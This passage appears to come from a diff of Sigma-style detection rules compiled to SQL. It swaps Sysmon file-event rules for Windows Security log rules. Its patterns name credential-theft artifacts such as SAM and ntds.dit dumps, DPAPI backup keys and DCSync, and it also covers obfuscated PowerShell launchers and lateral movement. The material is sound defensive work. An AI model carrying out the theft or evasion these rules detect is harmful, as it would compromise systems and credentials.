"win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1003.004" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "title": "Suspicious Remote Logon with Explicit Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", - "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "status": "test", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "status": "test", - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Domain Controllers acting as printer servers too? :)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "Unauthorized System Time Modification", + "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Unknown" + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_susp_time_modification.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate add-ins" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "status": "test", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' 